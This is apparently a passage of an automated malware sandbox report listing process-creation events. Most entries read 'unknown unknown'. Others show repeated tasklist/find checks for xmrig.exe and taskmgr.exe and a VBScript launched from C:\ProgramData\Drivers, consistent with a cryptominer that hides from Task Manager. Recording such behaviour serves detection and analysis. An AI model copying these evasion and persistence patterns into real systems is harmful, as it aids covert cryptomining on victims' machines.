Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\winproc.vbs"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\winproc.vbs"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown			Jump to behavior
